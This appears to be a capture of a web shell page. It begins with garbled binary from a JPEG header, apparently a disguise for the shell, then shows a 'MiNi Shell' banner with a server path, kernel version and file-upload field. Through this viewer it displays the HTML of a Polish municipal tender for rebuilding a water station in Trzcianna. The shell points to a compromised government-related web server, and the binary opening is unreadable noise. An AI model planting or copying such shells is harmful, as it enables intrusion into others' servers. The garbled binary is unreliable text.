JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220517/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220517/0016214701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Przebudowa i rozbudowa stacji wodociągowej w miejscowości Trzcianna” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Nowy Kawęczyn</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 750148383</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Nowy Kawęczyn</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Nowy Kawęczyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">96-115</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL715 - Skierniewicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">46 831-72-89</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">46 831-72-89</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@ugkaweczyn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ugkaweczyn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Przebudowa i rozbudowa stacji wodociągowej w miejscowości Trzcianna” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-80766d1c-d5be-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00162147</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-05-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00037004/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Przebudowa i rozbudowa stacji wodociągowej w miejscowości Trzcianna</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ugkaweczyn.ezamawiajacy.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ugkaweczyn.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną za pośrednictwem Platformy Zakupowej <br/>znajdującej się pod adresem: https://ugkaweczyn.ezamawiajacy.pl/<br/>2. Instrukcja korzystania z Platformy jest dostępna pod wyżej wskazanym adresem w zakładce <br/>„Regulacje i procedury procesu zakupowego”.<br/>3. Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do Zamawiającego, uważa się za dokumenty złożone w terminie, jeśli ich czytelna treść dotrze do <br/>Zamawiającego przed upływem wyznaczonego terminu. <br/>4. W przypadku korzystania z Platformy za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich złożenia/wysłania na Platformie. <br/>5. Ogólne zasady korzystania z Platformy: szczegółowe informacje w tym zakresie zawiera SWZ Dział XII<br/>6. Zamawiający, określa niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na <br/>Platformie tj.: <br/>A. Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s; <br/>B. Komputer klasy PC lub MAC, z aktualnym systemem operacyjnym wspieranym przez <br/>producenta; <br/>C. Zainstalowana dowolna przeglądarka internetowa wspierana przez producenta MS <br/>Internet Explorer, Firefox, Google Chrome lub MS Edge; <br/>D. Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf; <br/>E. Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do <br/>100 MB w txt, pdf, doc, xls, docx, zip, 7z, tar, gz, xml, XAdES. <br/>7. Zamawiający określa informacje na temat kodowania i czasu odbioru danych tj.: <br/>A. Plik załączony przez Wykonawcę na Platformie i zapisany, widoczny jest w systemie, <br/>jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku dostępna jest <br/>dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert. <br/>B. Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas <br/>(hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego odpowiednim <br/>źródłem czasu - zegarem Głównego Urzędu Miar.<br/>8. Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami <br/>korzystania z Platformy, Wykonawca winien skontaktować się z dostawcą rozwiązania <br/>teleinformatycznego Platforma zakupowa Gmina Nowy Kawęczyn tel. +48 22 257 22 <br/>23(infolinia dostępna w dni robocze, w godzinach 9.00-17.00) e mail:oneplace@marketplanet.pl<br/>9. Sposób sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami <br/>określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie <br/>sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla <br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o <br/>udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz <br/>rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie <br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może <br/>żądać zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający dopuszcza złożenie oferty w postaci katalogu</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 <br/>z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem <br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy <br/>95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), <br/>dalej „RODO”, Zamawiający informuje, że: <br/>1. jest administratorem danych osobowych Wykonawcy oraz osób, których dane Wykonawca <br/>przekazał w niniejszym postępowaniu;<br/>2. dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. C RODO w celu <br/>związanym z postępowaniem o udzielenie zamówienia publicznego na zadanie pn.:<br/>„Przebudowa i rozbudowa stacji wodociągowej w miejscowości Trzcianna” <br/>prowadzonym w trybie podstawowym;<br/>3. odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona <br/>zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia <br/>11 września 2019 r. Prawo zamówień publicznych (t.j. Dz.U. z 2021, poz. 1129), dalej <br/>„ustawa Pzp”; <br/>4. dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez <br/>okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, w sposób <br/>gwarantujący jego nienaruszalność.<br/>5. obowiązek podania przez Wykonawcę danych osobowych bezpośrednio go dotyczących jest <br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem <br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania <br/>określonych danych wynikają z ustawy Pzp; <br/>6. w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób <br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>7. Wykonawca posiada:<br/> na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących <br/>Wykonawcy; <br/> na podstawie art. 16 RODO prawo do sprostowania danych osobowych, o ile ich zmiana <br/>nie skutkuje zmianą wyniku postępowania o udzielenie zamówienia <br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz <br/>nie narusza integralności protokołu oraz jego załączników; <br/> na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania <br/>danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/> prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy <br/>Wykonawca uzna, że przetwarzanie jego danych osobowych narusza przepisy RODO;<br/>8. Wykonawcy nie przysługuje<br/> w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/> prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/> na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż <br/>podstawą prawną przetwarzania danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c <br/>RODO. <br/>9. W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia <br/>2016/679, wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od <br/>osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu <br/>sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie <br/>zamówienia publicznego lub konkursu.<br/>10. Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub <br/>uzupełnienia danych osobowych, o którym mowa w art. 16 rozporządzenia 2016/679, nie <br/>może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub <br/>konkursu ani zmianą postanowień umowy w zakresie niezgodnym z ustawą.<br/>11. Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie <br/>ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania <br/>o udzielenie zamówienia publicznego lub konkursu.<br/>12. W przypadku danych osobowych zamieszczonych przez Zamawiającego w Biuletynie <br/>Zamówień Publicznych, prawa, o których mowa w art. 15 i art. 16 rozporządzenia 2016/679, <br/>są wykonywane w drodze żądania skierowanego do Zamawiającego.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">: 1) W uzasadnionych przypadkach przysługują Pani/Panu<br/>następujące prawa: prawo dostępu, prawo do sprostowania, prawo do ograniczenia, prawo do<br/>wniesienia sprzeciwu, prawo do usunięcia, prawo do przenoszenia.<br/>2) Osoba, której dane dotyczą ma prawo wnieść skargę do organu nadzorczego jeżeli uważa że doszło<br/>do naruszenia ochrony danych osobowych. Organem nadzorczym w Polsce jest Prezes Urzędu<br/>Ochrony Danych Osobowych z siedzibą w Warszawie na ulicy Stawki 2 i wszystkie dane kontaktowe<br/>znajdują się na platformie www.uodo.gov.pl<br/>SEKCJA IV – PRZEDMIOT ZAMÓWIENI</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RG.271.4.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest wykonanie robót budowlanych w zakresie rozbudowy <br/>i przebudowy stacji wodociągowej zlokalizowane na działce nr 293/2w miejscowości <br/>Trzcianna, Gmina Nowy Kawęczyn, powiat skierniewicki, województwo łódzkie. <br/>2. Po zakończeniu robót budowlanych, Wykonawca uzyska w imieniu Zamawiającego decyzję <br/>o zezwoleniu na użytkowanie.<br/>3. Szczegółowy opis przedmiotu zamówienia został określony w dokumentacji <br/>projektowej – projekcie budowlanym, stanowiącym Załącznik nr 1 do SWZ. <br/>4. Zaleca się, aby Wykonawca dokonał wizji lokalnej w terenie, gdzie mają być prowadzone roboty objęte przedmiotem zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45231100-6 - Ogólne roboty budowlane związane z budową rurociągów</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45232152-2 - Roboty budowlane w zakresie przepompowni</p> <p class="mb-0">45232430-5 - Roboty w zakresie uzdatniania wody</p> <p class="mb-0">45247270-3 - Budowa zbiorników</p> <p class="mb-0">45252126-7 - Roboty budowlane w zakresie zakładów uzdatniania wody pitnej</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający przy wyborze oferty będzie kierował się następującymi kryteriami:<br/>1) Cena – 60 % <br/>2) Okres gwarancji na wykonane roboty budowlane oraz wbudowane materiały – 40% <br/>ad 1). Cena <br/> w zakresie tego kryterium oferta może uzyskać maksymalnie 60 pkt, <br/> ocena nastąpi na podstawie informacji wpisanych w formularzu ofertowym, <br/> oferta z najniższą ceną otrzyma 60 punktów, <br/> kolejne otrzymają punkty przyznane wg wzoru: <br/>na j ni ż sz a o f e r owa n a c e n a<br/>c en a o f e rt y b ad a ne j<br/>×60 ×100<br/>ad 2). Okres gwarancji<br/> w zakresie tego kryterium oferta może uzyskać maksymalnie 40 pkt, <br/> ocena nastąpi na podstawie informacji wpisanych w formularzu ofertowym, <br/> Zamawiający informuje, że oferowany okres gwarancji nie może być krótszy niż 36 m cy oraz nie może być dłuższy niż 60 m-cy od dnia odebrania przez Zamawiającego <br/>robót budowlanych i podpisania (bez uwag) protokołu końcowego, <br/> w przypadku nie wpisania żadnego okresu gwarancji w ofercie lub wpisania okresu <br/>krótszego niż 36 m-cy oferta Wykonawcy podlega odrzuceniu <br/> w przypadku wpisania w ofercie okresu dłuższego niż 60 m-cy, oferta uzyska 40 pkt, <br/> oferta z okresem gwarancji 60 m-cy otrzyma 40 punktów, <br/> w przypadku zaoferowania gwarancji pomiędzy 36 a 60 miesięcy, oferta uzyska <br/>punkty przyznane wg wzoru: <br/>b a d a n y o k r e s g wa r a n c j i<br/>n a j d ł ż sz y o f e r o wa n y o k r e s g w a r a n c j i<br/>×40 ×10</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału <br/>w postępowaniu dotyczące: <br/>1) zdolności do występowania w obrocie gospodarczym<br/>- Zamawiający nie określa warunku w ww. zakresie; <br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/>o ile wynika to z odrębnych przepisów <br/>- Zamawiający nie określa warunku w ww. zakresie; <br/>3) sytuacji ekonomicznej lub finansowej <br/>Wykonawca spełni warunek udziału w postępowaniu dotyczący sytuacji ekonomicznej lub <br/>finansowej, jeżeli wykaże, że: <br/>- Zamawiający nie określa warunku w ww. zakresie; <br/>4) zdolności technicznej lub zawodowej <br/>Wykonawca spełni warunek udziału w postępowaniu dotyczący zdolności technicznej lub <br/>zawodowej, jeżeli wykaże, że: <br/>a) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres <br/>prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał: <br/> jedną robotę budowlaną, która polegała na budowie, rozbudowie lub przebudowie <br/>stacji wodociągowej; <br/>b) w okresie realizacji zamówienia będzie dysponował <br/> kierownikiem budowy - osobą posiadającą uprawnienia budowlane do <br/>kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, <br/>instalacji <br/>i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i <br/>kanalizacyjnych lub odpowiadające im równoważne uprawnienia budowlane <br/>wydane na podstawie wcześniej obowiązujących przepisów, a w przypadku <br/>Wykonawców zagranicznych – uprawnienia budowlane do kierowania robotami <br/>równoważne do wyżej wskazanych; <br/> kierownikiem robót budowlanych (konstrukcyjnych) – osobą posiadającą <br/>uprawnienia budowlane do kierowania robotami budowlanymi w specjalności <br/>konstrukcyjno-budowlanej lub odpowiadające im równoważne uprawnienia <br/>budowlane wydane na podstawie wcześniej obowiązujących przepisów, <br/>a w przypadku Wykonawców zagranicznych – uprawnienia budowlane do <br/>kierowania robotami równoważne do wyżej wskazanych; <br/> kierownikiem robót sanitarnych – osobą posiadającą uprawnienia budowlane <br/>do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie <br/>sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych <br/>i kanalizacyjnych, lub odpowiadające im równoważne uprawnienia budowlane <br/>wydane na podstawie wcześniej obowiązujących przepisów, a w przypadku <br/>Wykonawców zagranicznych – uprawnienia budowlane do kierowania robotami <br/>równoważne do wyżej wskazanych;<br/> kierownikiem robót elektrycznych – osobą posiadającą uprawnienia budowlane <br/>do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie <br/>sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, lub <br/>odpowiadające im równoważne uprawnienia budowlane wydane na podstawie <br/>wcześniej obowiązujących przepisów, a w przypadku Wykonawców <br/>zagranicznych – uprawnienia budowlane do kierowania robotami równoważne do <br/>wyżej wskazanych; <br/>Zamawiający dopuszcza łączenie ww. funkcji przez jedną osobę posiadającą wymagane uprawnienia<br/>2. Wstępnym potwierdzeniem, że Wykonawca spełnia warunki udziału w postępowaniu <br/>będzie oświadczenie, o którym mowa w Rozdziale X. SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie żąda przedstawienia podmiotowych środków dowodowych w tym zakresie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu <br/>dotyczących zdolności zawodowej zamawiający żąda: <br/>a) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich <br/>5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia <br/>działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, <br/>daty i miejsca wykonania oraz 